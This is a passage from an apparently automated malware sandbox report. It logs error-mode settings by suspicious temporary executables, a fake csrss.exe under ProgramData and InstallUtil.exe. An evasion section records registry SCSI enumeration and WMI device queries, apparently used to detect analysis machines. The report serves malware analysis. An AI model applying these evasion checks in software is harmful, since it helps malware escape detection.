                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\987123.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\ufhjbuwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\5390.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity
